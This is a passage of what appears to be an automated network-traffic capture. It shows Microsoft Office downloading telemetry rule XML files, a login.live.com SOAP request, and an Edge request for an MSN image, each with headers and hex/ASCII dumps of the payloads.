                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:52 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        112192.168.2.54990013.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:52 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:52 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:52 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                        x-ms-request-id: c14060eb-d01e-007a-6e7d-3bf38c000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234952Z-r1d97b99577jlrkbhC1TEBq8d000000009f0000000009p0k
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:52 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        113192.168.2.54990213.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:52 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:53 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:52 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 502
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                        x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234952Z-178bfbc474b9fdhphC1NYCac0n00000000hg00000000mvmf
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:53 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        114192.168.2.54990413.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:54 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:54 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                                        x-ms-request-id: 733c43f5-901e-007b-0e8c-3aac50000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234954Z-1777c6cb754xrr98hC1TEB3kag0000000a1000000000w0rv
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:54 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        115192.168.2.54990540.126.31.71443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:54 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                        Content-Length: 4775
                                                                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                                                                        2024-11-20 23:49:54 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                        2024-11-20 23:49:54 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                        Expires: Wed, 20 Nov 2024 23:48:54 GMT
                                                                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        x-ms-route-info: C555_BL2
                                                                                                                                                                                                                                                        x-ms-request-id: 7e05851c-a071-409c-94ac-84cfb0e8051f
                                                                                                                                                                                                                                                        PPServer: PPV: 30 H: BL02EPF000276C5 V: 0
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:54 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 1918
                                                                                                                                                                                                                                                        2024-11-20 23:49:54 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        116192.168.2.54991023.57.90.1014437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:54 UTC506OUTGET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1
                                                                                                                                                                                                                                                        Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:55 UTC547INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t
                                                                                                                                                                                                                                                        Last-Modified: Fri, 01 Nov 2024 15:43:48 GMT
                                                                                                                                                                                                                                                        X-Source-Length: 822
                                                                                                                                                                                                                                                        X-Datacenter: eastus
                                                                                                                                                                                                                                                        X-ActivityId: 8573cc25-f04b-4276-9d05-cb327393d12e
                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                                        X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                        Content-Length: 4096
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=316493
                                                                                                                                                                                                                                                        Expires: Sun, 24 Nov 2024 15:44:47 GMT
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:54 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:49:55 UTC4096INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01
                                                                                                                                                                                                                                                        Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        117192.168.2.54990613.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:54 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:54 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                                        x-ms-request-id: 0cd4e810-101e-0079-148c-3a5913000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234954Z-r1d97b995777mdbwhC1TEBezag00000009k000000000c09e
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:55 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        118192.168.2.54990713.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:54 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:55 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                                        x-ms-request-id: ecab23c4-c01e-00ad-2963-3ba2b9000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234955Z-178bfbc474b7cbwqhC1NYC8z4n00000000m000000000gw2k
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:55 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        119192.168.2.54990813.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:54 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:55 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:55 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                                        x-ms-request-id: 6fd3b960-801e-00ac-6c64-3bfd65000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234955Z-178bfbc474bmqmgjhC1NYCy16c00000000sg00000000gc3d
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
